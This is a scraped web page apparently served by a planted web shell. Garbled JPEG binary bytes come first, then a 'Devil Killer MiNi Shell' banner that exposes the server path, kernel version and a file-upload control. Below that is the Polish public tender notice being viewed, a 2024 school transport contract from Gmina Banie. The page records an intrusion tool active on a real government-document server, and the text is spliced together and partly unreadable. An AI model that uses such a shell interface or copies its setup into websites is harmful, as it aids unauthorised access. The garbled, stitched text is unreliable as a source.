JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20231130/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20231130/0052469101-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> „Dowóz i odwóz uczniów do i z przedszkola, szkół podstawowych na terenie gminy Banie w roku 2024 na podstawie biletów miesięcznych i jednorazowych w ramach komunikacji regularnej” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Banie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 811684597</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Skośna 6</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Banie</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">74-110</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">zachodniopomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL428 - Szczeciński</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">urzad@banie.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.banie.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Dowóz i odwóz uczniów do i z przedszkola, szkół podstawowych na terenie gminy Banie w roku 2024 na podstawie biletów miesięcznych i jednorazowych w ramach komunikacji regularnej” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-54c433b2-8f64-11ee-9fb5-3edbb70f45bd</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00524691</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-11-30</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00053746/09/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Dowóz i odwóz uczniów do i z przedszkola, szkół podstawowych na terenie gminy Banie w roku 2024 na podstawie biletów miesięcznych i jednorazowych w ramach komunikacji regularnej</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://banie.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Szczegóły wymagań dot. komunikacji elektronicznej znajdują się w SWZ.<br/>Rozdział IV. KOMUNIKACJA W POSTĘPOWANIU<br/>2. W przedmiotowym postępowaniu zamawiający dopuszcza możliwość przekazywania sobie przez strony postępowania oświadczeń, wniosków, zawiadomień oraz informacji za pośrednictwem Platformy znajdującej się pod adresem: https://banie.ezamawiajacy.pl <br/>poprzez kafelek „Wiadomości” kierujący do modułu korespondencji.<br/><br/>Oferta wraz z załącznikami winna być sporządzona w języku polskim i złożona pod rygorem nieważności w formie elektronicznej lub w postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym za pośrednictwem Platformy dostępnej pod adresem https://banie.ezamawiajacy.pl.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Szczegóły wymagań organizacyjno-technicznych dot. korespondencji elektronicznej znajdują się w SWZ.<br/><br/>8. Zamawiający określa dopuszczalny format podpisu elektronicznego jako:<br/>1) dokumenty w formacie „pdf&#34; zaleca się podpisywać formatem PAdES,<br/>2) dopuszcza się podpisanie dokumentów w formacie innym niż „pdf&#34;, wtedy będzie wymagany oddzielny plik z podpisem. W związku z tym wykonawca będzie zobowiązany załączyć prócz podpisanego dokumentu oddzielny plik z podpisem.<br/>9. Zamawiający określa niezbędne wymagania sprzętowo- aplikacyjne umożliwiające pracę na Platformie Zakupowej tj.:<br/>1) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s;<br/>2) komputer klasy PC lub MAC spełniający wymagania zainstalowanego systemu operacyjnego <br/>oraz wymagania używanej przeglądarki internetowej;<br/>3) zainstalowana dowolna przeglądarka internetowa obsługująca TLS 1.2, <br/>4) zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf.<br/>10. Zamawiający określa dopuszczalne formaty przesyłanych danych tj. plików o wielkości do 2GB <br/>w pdf, doc, xls, docx, xlsx, zip, 7z.<br/>11. Zamawiający określa informacje na temat kodowania i czasu odbioru danych tj.:<br/>1) plik załączony przez wykonawcę na Platformie Zakupowej i zapisany, widoczny jest <br/>w Systemie, jako zaszyfrowany – format kodowania UTF8. Możliwość otworzenia pliku <br/>dostępna jest dopiero po odszyfrowaniu przez zamawiającego po upływie terminu otwarcia <br/>ofert.<br/>12. Oznaczenie czasu odbioru danych przez Platformę stanowi datę oraz dokładny czas (hh:mm:ss) <br/>generowany wg. czasu lokalnego serwera synchronizowanego z Głównym Urzędem Miar, który udostępnia poprzez Internet usługę umożliwiającą synchronizację czasu w systemach komputerowych z czasem urzędowym obowiązującym w Polsce.<br/>Oferta wraz z załącznikami winna być sporządzona w języku polskim i złożona pod rygorem nieważności w formie elektronicznej lub w postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym za pośrednictwem Platformy dostępnej pod adresem https://banie.ezamawiajacy.pl.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Szczegóły dot. RODO znajdują się w SWZ.<br/>Rozdział XVII. OCHRONA DANYCH OSOBOWYCH ZEBRANYCH PRZEZ ZAMAWIAJĄCEGO <br/>W TOKU POSTĘPOWANIA<br/>Na podstawie art. 19 ust. 1 PZP w związku z art. art. 13 ust. 1-3 rozporządzenia Parlamentu <br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych <br/>w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz <br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych), dalej „RODO”, <br/>Zamawiający informuje, że:<br/>1. Administratorem Pana/Pani danych osobowych jest Administratorem Pani/Pana danych <br/>osobowych jest: Gmina Banie reprezentowany przez Wójta Gminy Banie, z siedzibą <br/>w Baniach, ul. Skośna 6, 74-110 Banie, tel. 91 506 70 00, e-mail: urzad@banie.pl.<br/>2. Administrator wyznaczył inspektora ochrony danych, z którym można skontaktować się poprzez <br/>e-mail info@banie.pl w każdej sprawie dotyczącej przetwarzania Państwa danych osobowych.<br/>3. Państwa dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu <br/>związanym z niniejszym postępowaniem o udzielenie zamówienia publicznego, które jest <br/>prowadzone w trybie przetargu nieograniczonego.<br/>4. Odbiorcami Państwa danych osobowych będą osoby lub podmioty, którym udostępniona zostanie <br/>dokumentacja postępowania w oparciu o art. 74 PZP.<br/>5. Państwa dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 PZP przez okres 4 lat od <br/>dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza <br/>4 lata, okres przechowywania obejmuje cały czas trwania umowy (art. 78 ust. 4 PZP).<br/>6. Obowiązek podania przez Państwa danych osobowych bezpośrednio dotyczących Państwa jest <br/>wymogiem określonym w przepisach PZP, związanym z udziałem w niniejszym postępowaniu.<br/>7. W odniesieniu do Państwa danych osobowych decyzje nie będą podejmowane w sposób <br/>zautomatyzowany, stosownie do postanowień art. 22 RODO.<br/>8. Posiadają Państwo:<br/>1) zgodnie z art. 15 RODO - prawo dostępu do danych osobowych Państwa dotyczących (z <br/>zastrzeżeniem, że w sytuacji, gdy skorzystanie z tego prawa wymagałoby po stronie <br/>administratora niewspółmiernie dużego wysiłku, mogą Państwo zostać zobowiązani do <br/>wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności <br/>podania nazwy lub daty postępowania o udzielenie zamówienia publicznego albo <br/>sprecyzowania nazwy lub daty zakończonego postępowania o udzielenie zamówienia);<br/>2) zgodnie z art. 16 RODO - prawo do sprostowania Państwa danych osobowych (z tym, że <br/>skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o <br/>udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z <br/>PZP oraz nie może naruszać integralności protokołu z postępowania oraz załączników do <br/>niego);<br/>3) zgodnie z art. 18 RODO - prawo żądania od administratora ograniczenia przetwarzania danych <br/>osobowych z zastrzeżeniem okresu trwania postępowania o udzielenie zamówienia <br/>publicznego lub konkursu oraz przypadków, o których mowa w art. 18 ust. 2 RODO (prawo do <br/>ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu <br/>zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby <br/>fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej <br/>lub państwa członkowskiego);<br/>4) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uznają <br/>Państwo, że przetwarzanie Państwa danych osobowych narusza przepisy RODO;</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">SPU.271.1.2023.KP</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest „Dowóz i odwóz uczniów do i z przedszkola, szkół podstawowych na terenie gminy Banie w roku 2024 na podstawie biletów miesięcznych <br/>i jednorazowych w ramach komunikacji regularnej”.<br/>2. Oznaczenie przedmiotu zamówienia we Wspólnym Słowniku Zamówień (CPV): <br/>60112000-6 – Usługi w zakresie publicznego transportu drogowego.<br/>3. Przedmiotem zamówienia jest świadczenie usługi w zakresie dowozu i odwozu uczniów <br/>do i z przedszkola oraz szkół podstawowych na terenie gminy Banie na podstawie biletów <br/>miesięcznych. Zamówienie obejmuje także dowóz i odwóz uczniów w wieku od 3 do 5 lat <br/>do i z przedszkola i szkół podstawowych na terenie gminy Banie na podstawie biletów <br/>jednorazowych. <br/>4. Przewozy będą realizowane w dni robocze z wyłączeniem wakacji, ferii, przerw świątecznych, dni <br/>wolnych od zajęć oraz dni w których szkoły będą całkowicie zamknięte z powodu okoliczności <br/>związanych z wystąpieniem epidemii, w tym m.in. wirusa SARS-CoV-2 lub choroby wywołanej tym <br/>wirusem (COVID-19). W przypadku odpracowywania zajęć szkolnych w innym dniu, wolnym od <br/>zajęć, Wykonawca zobowiązany będzie zapewnić przewóz uczniom zgodnie z ustaleniami <br/>z osobami reprezentującymi placówki oświatowe objęte niniejszym zamówieniem. Uczniowie <br/>w trakcie przewozu powinni posiadać przy sobie ważną legitymację szkolną.<br/>5. Niniejszym postępowaniem objęty jest transport (trasa: miejsce zamieszkania – szkoła/przedszkole <br/>– miejsce zamieszkania) do następujących placówek na terenie gminy Banie:<br/>1) Szkoła Podstawowa w Swobnicy, Swobnica 12, <br/>2) Szkoła Podstawowa im. Mikołaja Kopernika w Lubanowie, Lubanowo 53,<br/>3) Szkoła Podstawowa im. Marii Skłodowskiej – Curie w Baniach, ul. Sportowa 1, <br/>4) Przedszkole w Baniach, ul. Pocztowa 3. <br/>6. Przedmiot zamówienia będzie realizowany poprzez zakup ulgowych imiennych biletów <br/>miesięcznych oraz ulgowych biletów jednorazowych na podstawie przepisów ustawy z dnia <br/>20 czerwca 1992 r. o uprawnieniach do ulgowych przejazdów środkami publicznego transportu <br/>zbiorowego (Dz.U. 2018 r. poz. 295 ze zm.).<br/><br/>Szczegółowy opis przedmiotu zamówienia znajduje się w SWZ oraz załącznikach do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60112000-6 - Usługi w zakresie publicznego transportu drogowego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-01-01 do 2024-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Rozdział XXXIII. OPIS KRYTERIÓW OCENY OFERT WRAZ Z PODANIEM WAG TYCH KRYTERIÓW I SPOSOBU OCENY OFERT<br/>1. Kryteria oceny ofert – zamawiający uzna oferty za spełniające wymagania i przyjmie do <br/>szczegółowego rozpatrywania, jeżeli:<br/>1) oferta spełnia wymagania określone niniejszą specyfikacją,<br/>2) oferta została złożona w określonym przez zamawiającego terminie,<br/>3) wykonawca przedstawił ofertę zgodną co do treści z wymaganiami zamawiającego.<br/>2. Kryteria oceny ofert – stosowanie matematycznych obliczeń przy ocenie ofert, stanowi podstawową <br/>zasadę oceny ofert, które oceniane będą w odniesieniu do najkorzystniejszych warunków <br/>przedstawionych przez wykonawców w zakresie każdego kryterium.<br/>3. Wybór oferty zostanie dokonany w oparciu o przyjęte w niniejszym postępowaniu kryteria oceny <br/>ofert przedstawione poniżej:<br/>Przy wyborze najkorzystniejszej oferty zamawiający będzie kierował się następującymi kryteriami <br/>i odpowiadającymi im znaczeniami oraz w następujący sposób będzie oceniał spełnienie kryteriów:<br/>L.p. Nazwa kryterium Znaczenie<br/>w kryterium (w %)<br/>Liczba możliwych<br/>do uzyskania punktów<br/>1. Cena biletów brutto (miesięcznych i <br/>jednorazowych) CBB<br/>60% 60 pkt<br/>2. Wiek autobusu 40 % 40 pkt<br/>1) Cena biletów brutto (CBB) = 60 %<br/>Zamawiający przy obliczaniu tego kryterium będzie brał pod uwagę cenę ofertową (tj. cenę za całość <br/>przedmiotu zamówienia). <br/>Ocena powyższego kryterium zostanie dokonana wg następującego wzoru:<br/> oferowana cena minimalna brutto <br/>CBB ------------------------------------------------------- x 60 = liczba punktów<br/> cena badanej oferty brutto<br/>2) Wiek autobusu = 40% - rozumiany jako średnia wieku wszystkich autobusów jakie <br/>Wykonawca wskaże w formularzu oferty (załącznik nr 1 do SWZ).<br/>Średnia wieku autobusów wyliczona będzie poprzez zsumowanie wieku wszystkich autobusów <br/>i podzieleniu przez ich liczbę.<br/>a) średnia wieku autobusów do 3 lat - 40 pkt,<br/>b) średnia wieku autobusów powyżej 3 lat do 8 lat - 20 pkt,<br/>c) średnia wieku autobusów powyżej 8 lat do 12 lat - 10 pkt,<br/>d) średnia wieku autobusów powyżej 12 lat - 0 pkt.<br/>W przypadku braku podania przez Wykonawcę w ofercie roku produkcji autobusów lub w przypadku<br/>podania mniejszej liczby autobusów, niż jest to określone w rozdziale XVIII SWZ (bez wliczania <br/>autobusu rezerwowego) wykonawca otrzyma 0 punktów w tym kryterium.<br/>Łączna liczba punktów za ofertę = liczba punktów za kryterium: ceny biletów brutto (maks. 60) + liczba <br/>punktów za kryterium: wiek autobusu (maks. 40).</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">wiek autobusu</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Rozdział XXIV. INFORMACJA O WARUNKACH UDZIAŁU W POSTĘPOWANIU O UDZIELENIE <br/>ZAMÓWIENIA<br/>Na podstawie art. 112 PZP zamawiający określa warunki udziału w postępowaniu dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku w tym zakresie.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:.<br/>Warunek ten zostanie spełniony, jeśli wykonawca wykaże posiadanie aktualnych uprawnień do wykonywania krajowego transportu drogowego osób, wydanych na podstawie ustawy z dnia6 września 2001 o transporcie drogowym (Dz. U. z 2022 r. poz. 2201 ze zm.).<br/>Warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, jest spełniony, jeżeli co najmniej jeden z wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej i zrealizuje usługi, do których realizacji te uprawnienia są wymagane.<br/>3) sytuacji ekonomicznej lub finansowej:<br/>Zamawiający uzna, że wykonawca spełnia warunek jeżeli wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia o wartości, co najmniej 4 000 000,00 zł (czterech milionów złotych).<br/>4) zdolności technicznej lub zawodowej:<br/>a) warunek zdolności zawodowej - zostanie spełniony, jeśli wykonawca wykaże, iż w ciągu ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał lub wykonuje co najmniej dwie minimum 10-miesięczne usługi w zakresie dowozu uczniów do szkół w ramach przewozów regularnych o wartości min. 250 000,00 zł każda. Przez linię regularną zamawiający rozumie przewóz osób wykonywany w określonych odstępach czasu na określonej trasie (linii komunikacyjnej). W przypadku zamówień wykonywanych (niezakończonych) zamawiający uzna warunek za spełniony, jeśli wykonawca wykaże, że świadczone usługi w ramach umowy (nadal obowiązującej) były wykonywane przez minimum 3 m-ce.<br/>b) warunek zdolności technicznej - zostanie spełniony jeżeli wykonawca posiada potencjał techniczny, który pozwoli na prawidłowe wykonanie zamówienia, to znaczy musi wykazać, że dysponuje lub będzie dysponować odpowiednimi środkami transportu w liczbie umożliwiającej przewóz uczniów wraz z opiekunami – minimum 8 autobusami <br/>(7 autobusów min. 50 miejsc siedzących oraz autobus rezerwowy min. 50 miejsc siedzących zabezpieczony na wypadek awarii pojazdu lub planowanego przeglądu albo remontu pojazdu). Liczba pojazdów musi gwarantować dotarcie uczniów na zajęcia szkolne, a następnie ich powrót do miejsca zamieszkania (zgodnie z Rozdziałem XVIII <br/>SWZ – OPIS PRZEDMIOTU ZAMÓWIENIA).<br/>c) warunek kwalifikacji zawodowych (dotyczy osób skierowanych do realizacji zamówienia) –zostanie spełniony, jeżeli wykonawca wykaże, że dysponuje lub będzie dysponować minimum 8 kierowcami posiadającymi odpowiednie kwalifikacje zawodowe zgodnie z ustawą z dnia 6 września 2001 r. o transporcie drogowym, skierowanymi do realizacji zadania.<br/>Warunek posiadania zdolności technicznych lub zawodowych dla podmiotów występujących wspólnie będzie oceniany łącznie dla wszystkich podmiotów. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Szczegółowo określa SWZ<br/>Rozdział XXVIII. SPOSÓB PRZYGOTOWANIA OFERT <br/>Zasady obowiązujące podczas przygotowywania ofert<br/>1. Oferta musi zawierać następujące oświadczenia i dokumenty:<br/>1) formularz oferty sporządzony wg wzoru formularza oferty stanowiącego załącznik <br/>nr 1 do SWZ. W przypadku 